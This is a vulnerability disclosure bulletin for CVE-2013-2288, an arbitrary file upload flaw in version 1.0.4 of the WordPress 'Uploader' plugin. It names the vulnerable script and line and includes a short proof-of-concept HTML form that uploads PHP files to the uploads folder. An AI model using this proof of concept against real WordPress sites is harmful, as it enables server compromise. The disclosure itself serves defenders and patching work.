Vulnerabilities Disclosure

Remote File Inclusion in Uploader version 1.0.4

Dognædis Ref.: DGS-SEC-17

CVE Ref: CVE-2013-2288

Release Date: 2013/03/01

Discover Credits: CodeV - Code Analyzer

Bulletin Author(s): AMPP - CodeV Team


Type: Remote File Inclusion

Level: High (Low/High/Critical)

CVSS: 4 (Av:N/AC:L/Au:S/C:N/I:P/A:P)

Vulnerable Application: Uploader plugin for WordPress (1.0.4)

Uploader creates an Uploader role for file uploading.


File: /wp-content/plugins/uploader/uploadify/uploadify.php Vulnerable Argument(s): $target_file

line 26: move_uploaded_file($temp_file, $target_file)

Proof(s) of Concept:
<form action="<app_root>/wp-content/plugins/uploader/uploadify/uploadify.php?folder=/wordpress/wp-content/uploads/&fileext=php" method="post"
<label for="file">Filename:</label>
<input type="file" name="Filedata" id="Filedata"><br>
<input type="submit" name="submit" value="Submit">

WordPress plugin that allows the user to upload files to the server.

By using this exploit, might be possible to completely compromise the Web Server, only constrained by the Apache User permissions.

Verify the location of the files, just files located on the temporary folder can be moved to permanent locations.

Official Solution:
At the moment, there is no official solution for the reported vulnerabilities.
The developer is yet to answer the first contact attempt.

External References:

Download the Vulnerability Report (PDF)

© Copyright 2015 CodeV